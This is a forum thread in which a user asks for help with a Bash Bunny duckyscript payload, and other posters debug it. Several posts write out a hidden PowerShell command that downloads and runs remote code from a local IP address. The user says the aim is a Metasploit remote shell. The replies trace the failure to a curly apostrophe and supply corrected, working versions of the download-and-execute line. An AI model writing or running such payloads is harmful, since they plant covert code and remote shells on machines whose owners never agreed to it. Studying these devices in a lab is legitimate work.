Jump to content

Recommended Posts

Posted

Hi, im testing something with my BB and i got stuck on a duckyscript line.

Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\;

To my opinion this should be ok, however when executed this is what he types in:

Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring(

I dont understand why he doesnt esape the ' properly, but thats probably because of my own lack of knowledge :-) Could someone help me out?

Posted

With the v1.1 firmware, you should now be able to use 'RUN WIN powershell.....".

If you are not wanting to put the duckyscript in a separate file, which is generally recommended when you have more than a few lines, I would create a payload that opens notepad and types a few lines to see where you are having issues. Keep in mind that the STRING you are printing is interpreted by BASH prior to being fed to the HID device.

First guess without trying anything is that you don't need to escape the single quote after 'downloadstring'

Posted

@LowValueTarget Thanks for your reply. I tried it with WIN RUN powershell. Results where the same.

I'm trying to create the same thing as on this page: https://cyberarms.wordpress.com/2017/03/27/bash-bunny-windows-remote-shell-using-metasploit-powershell/

Everything seems to work fine, cept for the powershell line he enters in the 'run' field. i tried with or without escaping the single quote, that did not make a difference. When i remove the single quote he pastes the while line just fine. So it does seem the problem is with the single quote, question is why it doesnt get escaped properly. It did seem to work in the tutorial i pasted above and also on some online video i seen. 

Posted (edited)

I think its cause : \(\’http://192.168.145.138/ztgBcA7n\'\)\; 

the first one isn't a single quote but a curly apostrophe and the ending is a single quote.

and there is no definition for the curly apostrophe ’ in your language.json file.

 

Edited by elkentaro
  • Upvote 1
  • 4 weeks later...
Posted
On 4/14/2017 at 6:26 AM, rizzah said:

Hi, im testing something with my BB and i got stuck on a duckyscript line.

Q STRING powershell.exe -nop -w hidden -c \$H=new-object net.webclient\;IEX \$H.downloadstring\(\’http://192.168.145.138/ztgBcA7n\'\)\;

To my opinion this should be ok, however when executed this is what he types in:

Q STRING powershell.exe -nop -w hidden -c $H=new-object net.webclient;IEX $H.downloadstring(

I dont understand why he doesnt esape the ' properly, but thats probably because of my own lack of knowledge :-) Could someone help me out?

Or you can enclose you whole string command in double quotes and then you only have to escape "&"s and other double quotes you want to show up.

Q STRING "powershell.exe -nop -w hidden -c \"\$H=new-object net.webclient;IEX \$H.downloadstring('http://192.168.145.138/ztgBcA7n\');\""
or shortened....
Q STRING "powershell.exe -nop -w hidden -c \"IEX (new-object net.webclient).downloadstring('http://192.168.145.138/ztgBcA7n')\""

 

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...